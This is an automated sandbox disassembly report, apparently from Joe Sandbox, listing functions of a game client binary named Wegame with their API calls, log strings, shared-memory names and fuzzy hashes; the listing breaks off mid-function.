                                                                • Instruction Fuzzy Hash: 9FD13571600310ABC720DF18ED45B5BB7F5FF84304F548A2EE84987291DB79EA58CB9A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004422BC Relevance: 30.2, APIs: 16, Strings: 1, Instructions: 487COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(0000007C), ref: 00442307
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(00000030), ref: 00442333
                                                                • ?is@?$ctype@D@std@@QBE_NFD@Z.MSVCP140(00000004,?), ref: 00442353
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(00000025), ref: 0044238B
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(00000024), ref: 004423CC
                                                                • ?narrow@?$ctype@D@std@@QBEDDD@Z.MSVCP140(?,00000000), ref: 00442401
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(0000002A), ref: 0044247D
                                                                • ?is@?$ctype@D@std@@QBE_NFD@Z.MSVCP140(00000004,?), ref: 004424AB
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(0000002E), ref: 004424E5
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(0000002A), ref: 00442507
                                                                • ?is@?$ctype@D@std@@QBE_NFD@Z.MSVCP140(00000004,?), ref: 00442530
                                                                • ?narrow@?$ctype@D@std@@QBEDDD@Z.MSVCP140(?,00000000), ref: 00442577
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(0000007C), ref: 00442629
                                                                • ?narrow@?$ctype@D@std@@QBEDDD@Z.MSVCP140(?,00000000), ref: 00442669
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(0000007C), ref: 00442746
                                                                • ?tolower@?$ctype@_W@std@@QBE_W_W@Z.MSVCP140(00000020), ref: 0044280D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?tolower@?$ctype@_W@std@@$D@std@@$?is@?$ctype@?narrow@?$ctype@
                                                                • String ID: 3
                                                                • API String ID: 124437855-1842515611
                                                                • Opcode ID: 7b5c018e3a22e529e068c5af54c828394d86984005975a2c1591beb83926ebbb
                                                                • Instruction ID: a91ae963334e8c5a6a778da911742d423952b226801ca4ef0864d9e859a66ee0
                                                                • Opcode Fuzzy Hash: 7b5c018e3a22e529e068c5af54c828394d86984005975a2c1591beb83926ebbb
                                                                • Instruction Fuzzy Hash: 7012BE30500146EFEB19CF28C694AAA7FB0FF06304F944086F946CB362D7B9D956DB5A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00416380 Relevance: 30.2, APIs: 10, Strings: 7, Instructions: 438COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,?), ref: 0041BE37
                                                                • memset.VCRUNTIME140(?,00000000,00000200,00000003,?,?,85A35C35), ref: 0041BF7E
                                                                • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?), ref: 0041C068
                                                                • _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,?,?,-00000010,00000000,?,?,?), ref: 0041C152
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?), ref: 0041C198
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?), ref: 0041C23E
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?), ref: 0041C29D
                                                                • wcschr.VCRUNTIME140(00000000,0000005C,00000000,?,?), ref: 0041C2E6
                                                                • memset.VCRUNTIME140(?,00000000,00000400), ref: 0041C2FC
                                                                • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000200,00000000,00000000,?,00000000,00000400), ref: 0041C316
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memset$_wcsicmpwcschrwcscpy_swcsncpy_s
                                                                • String ID: 7$7$VFileSysBase::CreateFile $VFileSysBase::CreateFile() $VFileSysBase::CreateFile() $VFileSysBase::CreateFile() $VFileSysBase::GetNameTableEntrySize()
                                                                • API String ID: 4021017024-3742318621
                                                                • Opcode ID: f0453239ce806efcf16d0863a7ee554aea7df4a471414dcc4ca33b9bb903ab4c
                                                                • Instruction ID: 1eeff8b5f859a74bb40cc3096b801b4f83b03829086de450e6044db73e016f40
                                                                • Opcode Fuzzy Hash: f0453239ce806efcf16d0863a7ee554aea7df4a471414dcc4ca33b9bb903ab4c
                                                                • Instruction Fuzzy Hash: D81290719012189FDB24DF24DC84BDA77B6FF84304F0445AEE40997251DB3AAAE4CFA9
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00448EE9 Relevance: 30.1, APIs: 11, Strings: 6, Instructions: 330COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00448EF3
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 00448F2D
                                                                  • Part of subcall function 00441E85: __EH_prolog3.LIBCMT ref: 00441E8C
                                                                • _Copy_construct_from.LIBCPMT ref: 00448F59
                                                                  • Part of subcall function 0044DF19: __EH_prolog3.LIBCMT ref: 0044DF20
                                                                  • Part of subcall function 0044DF19: _Copy_construct_from.LIBCPMT ref: 0044DF48
                                                                  • Part of subcall function 0044DF19: ?send_msg@@YAXPBDV?$shared_ptr@Umsg_base@@@std@@@Z.COMMON(00448F66), ref: 0044DF55
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?), ref: 00448F9B
                                                                • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON ref: 00448FE7
                                                                • ?get_workingdir_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 00448FF3
                                                                • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?), ref: 00449021
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 00449157
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 00449228
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                • \tpf_ui\lua_script\, xrefs: 00449026
                                                                • [TPFUIFileSys]HandleReadFile, %ws doesn't exist, xrefs: 004492C5
                                                                • [TPFUIFileSys]HandleReadFile, Get %ws size fail, xrefs: 004491F4
                                                                • [TPFUIFileSys]HandleReadFile, Read %ws file fail, xrefs: 004491A6
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp, xrefs: 00449183, 004491D1, 00449254, 004492A2
                                                                • [TPFUIFileSys]HandleReadFile, Open %ws fail, xrefs: 00449277
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?u8to16@common@ierd_tgp@@H_prolog3U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@4@@W@std@@$?get_log_instance@base@@Application@common@ierd_tgp@@Copy_construct_fromLogger@1@$?get_workingdir_path@?instance@?send_msg@@H_prolog3_H_prolog3_catch_Umsg_base@@@std@@@V123@V?$shared_ptr@
                                                                • String ID: [TPFUIFileSys]HandleReadFile, %ws doesn't exist$[TPFUIFileSys]HandleReadFile, Get %ws size fail$[TPFUIFileSys]HandleReadFile, Open %ws fail$[TPFUIFileSys]HandleReadFile, Read %ws file fail$\tpf_ui\lua_script\$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp
                                                                • API String ID: 1704057657-3438003513
                                                                • Opcode ID: dd2ecaedd85ab5665b65b50847e8aa245b14aed37d88fd4af3a5eb3bf49d0fda
                                                                • Instruction ID: 4173d025e63a2d67dc7e3fce806c0f84cdbce76dec9dc9c56689282f2445a5df
                                                                • Opcode Fuzzy Hash: dd2ecaedd85ab5665b65b50847e8aa245b14aed37d88fd4af3a5eb3bf49d0fda
                                                                • Instruction Fuzzy Hash: 64D19070D00248EFDB14EFA5C895BDEB7B4BF19308F64409EE045AB281DB78AE45CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00442847 Relevance: 28.9, APIs: 19, Instructions: 374COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3.LIBCMT ref: 00442851
                                                                  • Part of subcall function 004435FA: __EH_prolog3.LIBCMT ref: 00443601
                                                                  • Part of subcall function 004435FA: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,00442867,?,00000001,000000DC,004412FD,00441B02,?,Function_000411C7,?,?,00000014,00441B4E,?,00441B02), ref: 0044361F
                                                                  • Part of subcall function 004435FA: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000,?,00441B02,00000008,00442867,?,00000001,000000DC,004412FD,00441B02,?,Function_000411C7,?,?), ref: 0044364C
                                                                • ?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(?,?,?,00000001,000000DC,004412FD,00441B02,?,Function_000411C7,?,?,00000014,00441B4E,?,00441B02), ref: 00442882
                                                                • ?flags@ios_base@std@@QBEHXZ.MSVCP140(?,?,00000014,00441B4E,?,00441B02), ref: 004428C6
                                                                • ?width@ios_base@std@@QBE_JXZ.MSVCP140 ref: 004428DF
                                                                • ?width@ios_base@std@@QAE_J_J@Z.MSVCP140(00000000,00000000,00000000,00000000), ref: 00442932
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 0044295E
                                                                • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(0000002B), ref: 00442975
                                                                • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(0000002D), ref: 0044298C
                                                                • ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(00000020), ref: 004429A3
                                                                • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 004429B5
                                                                  • Part of subcall function 00442130: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004421B7
                                                                  • Part of subcall function 0044E126: ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,?,?,?,00441B02,?), ref: 0044E130
                                                                  • Part of subcall function 0044E126: ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,?,00441B02,?), ref: 0044E16A
                                                                  • Part of subcall function 00445421: ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(85A35C35,CF8BE2D3,?,00000000,00475A4A,000000FF,?,00442C54,?,00441B02,?,00000000), ref: 00445451
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 00442C77
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@@std@@$?pptr@?$basic_streambuf@?widen@?$basic_ios@$?width@ios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_ostream@??1?$basic_ios@??1?$basic_ostream@?flags@ios_base@std@@?gptr@?$basic_streambuf@?imbue@?$basic_ios@D@std@@@1@_Unothrow_t@std@@@V32@@V?$basic_streambuf@Vlocale@2@__ehfuncinfo$??2@
                                                                • String ID:
                                                                • API String ID: 1617770253-0
                                                                • Opcode ID: 3c82064cb0ded6bf970fc92afbea7b9293b434c92f5a1d4c6d3d5f1e9fcbe4a8
                                                                • Instruction ID: 9a035d8f23f527c12c01641e94ac0d5dff78c8bb59b0596f141433ed4e5f25c1
                                                                • Opcode Fuzzy Hash: 3c82064cb0ded6bf970fc92afbea7b9293b434c92f5a1d4c6d3d5f1e9fcbe4a8
                                                                • Instruction Fuzzy Hash: B1E18D71A002599FDF14DFA8C994AADBBB1FF48304F58449DF80AA7392CB74AD81CB44
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00404C40 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 487COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00471E78), ref: 00404E8F
                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00404ED7
                                                                • memset.VCRUNTIME140(?,00000000,00000030), ref: 00404F23
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: _invalid_parameter_noinfo_noreturn$memset
                                                                • String ID: VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $VFSHelper::CopyFile() $F@$F@
                                                                • API String ID: 3820209055-492233284
                                                                • Opcode ID: 53e880eb67ad40d7898b6b35d6b068ea72653ef00cd1e34035170c46427661e9
                                                                • Instruction ID: 9bbe980837f71d1ff3597c7967a25092dba9927036f649ee052874770c42499b
                                                                • Opcode Fuzzy Hash: 53e880eb67ad40d7898b6b35d6b068ea72653ef00cd1e34035170c46427661e9
                                                                • Instruction Fuzzy Hash: 4612AD70A00118CFCF24DF54C884BAEB7B1FF85304F2481AAE445AB295DB399E85CF99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 004440C1 Relevance: 24.8, APIs: 3, Strings: 11, Instructions: 350COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004440C8
                                                                  • Part of subcall function 00441C6C: __EH_prolog3.LIBCMT ref: 00441C73
                                                                  • Part of subcall function 00443F20: __EH_prolog3.LIBCMT ref: 00443F27
                                                                  • Part of subcall function 00443E7F: __EH_prolog3.LIBCMT ref: 00443E86
                                                                  • Part of subcall function 00443F4B: __EH_prolog3.LIBCMT ref: 00443F52
                                                                • ?instance@Application@common@ierd_tgp@@SAPAV123@XZ.COMMON ref: 0044415E
                                                                • ?get_workingdir_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 00444167
                                                                  • Part of subcall function 0044F68F: __EH_prolog3.LIBCMT ref: 0044F696
                                                                  • Part of subcall function 0044F68F: ?reg_service@@YAXPBDV?$function@$$A6AXPBDAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z@std@@PAX@Z.COMMON(?), ref: 0044F6BD
                                                                  • Part of subcall function 0044F6D9: __EH_prolog3.LIBCMT ref: 0044F6E0
                                                                  • Part of subcall function 0044F6D9: ?reg_service@@YAXPBDV?$function@$$A6AXV?$shared_ptr@Umsg_base@@@std@@@Z@std@@PAX@Z.COMMON(?), ref: 0044F707
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3$?reg_service@@Application@common@ierd_tgp@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@V?$function@$$Z@std@@$?get_workingdir_path@?instance@D@2@@std@@D@2@@std@@@H_prolog3_Umsg_base@@@std@@@V123@V?$shared_ptr@
                                                                • String ID: 0$i_service_collect_decs_files$i_service_download_tpfui_file$i_service_file_decode$i_service_get_str_md5$i_service_mount_plugin_vfs$i_service_pre_download_file$i_service_read_file$i_service_remove_file$i_service_update_redirect_file_list_to_file$i_service_update_redirect_url_map
                                                                • API String ID: 505869761-2750394694
                                                                • Opcode ID: b5f025beb89e6e17ea5af462f8378b8cdb5187d295817763d4c7067c659e034c
                                                                • Instruction ID: 2311d8ebb29dec8061e866ed1c00c42eeb2f4adc509cb8383771d227a71389a3
                                                                • Opcode Fuzzy Hash: b5f025beb89e6e17ea5af462f8378b8cdb5187d295817763d4c7067c659e034c
                                                                • Instruction Fuzzy Hash: 53F1F9B0D16294DEDB01DFA9C64979CBFF0AF19308F15C1DED008AB252D3B99A08DB56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0044A62E Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 224stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0044A638
                                                                • ??0Shared_mem_obj@common@ierd_tgp@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@I0_N@Z.COMMON(?,00010014,?,00000000), ref: 0044A6DF
                                                                • ?is_shared_mem_exist@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,WEB_REDIRECT_URL_MEM,00000014,0000008C,0043FE5E,?,?,00000010,0044C237,?,?), ref: 0044A755
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MEM,00000014,0000008C,0043FE5E,?,?,00000010,0044C237), ref: 0044A79F
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp,000003F3,0048BBC7,?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MEM,00000014,0000008C), ref: 0044A7E2
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(0000000F,?,?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MEM,00000014,0000008C,0043FE5E,?,?), ref: 0044A815
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,WEB_REDIRECT_URL_MEM,00000014,0000008C,0043FE5E,?,?,00000010,0044C237), ref: 0044A8AD
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420F1B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MEM,00000014,0000008C,0043FE5E,?,?,00000010,0044C237), ref: 0044A839
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                Strings
                                                                • [TPFUIFileSys][OnUpdateRedirectListToFile] create share mem failed, xrefs: 0044A8E6
                                                                • [TPFUIFileSys][OnUpdateRedirectListToFile] write share mem failed, out of size=%d , xrefs: 0044A878
                                                                • [TPFUIFileSys][OnUpdateRedirectListToFile] open mem failed, error=%d , xrefs: 0044A7E9
                                                                • WEB_REDIRECT_URL_MEM, xrefs: 0044A6A1, 0044A736
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp, xrefs: 0044A7CA, 0044A85C, 0044A8D0
                                                                • WEB_REDIRECT_URL_MEM_MUTEX, xrefs: 0044A67B
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$D@std@@U?$char_traits@V?$allocator@V?$basic_string@memmove$?is_shared_mem_exist@common@ierd_tgp@@D@2@@std@@D@2@@std@@@ErrorH_prolog3H_prolog3_LastShared_mem_obj@common@ierd_tgp@@mallocstrncpy
                                                                • String ID: WEB_REDIRECT_URL_MEM$WEB_REDIRECT_URL_MEM_MUTEX$[TPFUIFileSys][OnUpdateRedirectListToFile] create share mem failed$[TPFUIFileSys][OnUpdateRedirectListToFile] open mem failed, error=%d $[TPFUIFileSys][OnUpdateRedirectListToFile] write share mem failed, out of size=%d $e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp
                                                                • API String ID: 1326427004-1003685569
                                                                • Opcode ID: 868fb955349e07df5d864775bb50bbe2da58bf9c91ad2ca026ed1ae43a3e934e
                                                                • Instruction ID: d7c387a6d9592185bf2a0abecb111ada571290a79ce660161ae737710c837fc8
                                                                • Opcode Fuzzy Hash: 868fb955349e07df5d864775bb50bbe2da58bf9c91ad2ca026ed1ae43a3e934e
                                                                • Instruction Fuzzy Hash: 9091D470D40304EFEB21EF65C841BEEBBB4AF55304F24819EE445AB282DB789E45CB59
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0044A91D Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 224stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0044A927
                                                                • ??0Shared_mem_obj@common@ierd_tgp@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@I0_N@Z.COMMON(?,00010014,?,00000000), ref: 0044A9CE
                                                                • ?is_shared_mem_exist@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,WEB_REDIRECT_URL_MAP_MEM,00000018,0000008C,0043FEED,?,?,00000010,0044C24C,?,?), ref: 0044AA44
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MAP_MEM,00000018,0000008C,0043FEED,?,?,00000010,0044C24C), ref: 0044AA8E
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tpfuifilesys.cpp,00000429,0048BBC7,?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MAP_MEM,00000018,0000008C), ref: 0044AAD1
                                                                  • Part of subcall function 0046E3BC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0040CD71,7FFFFFFE,?), ref: 0046E3D1
                                                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(0000000F,?,?,?,?,?,?,?,C0000000,00000000,WEB_REDIRECT_URL_MAP_MEM,00000018,0000008C,0043FEED,?,?), ref: 0044AB04
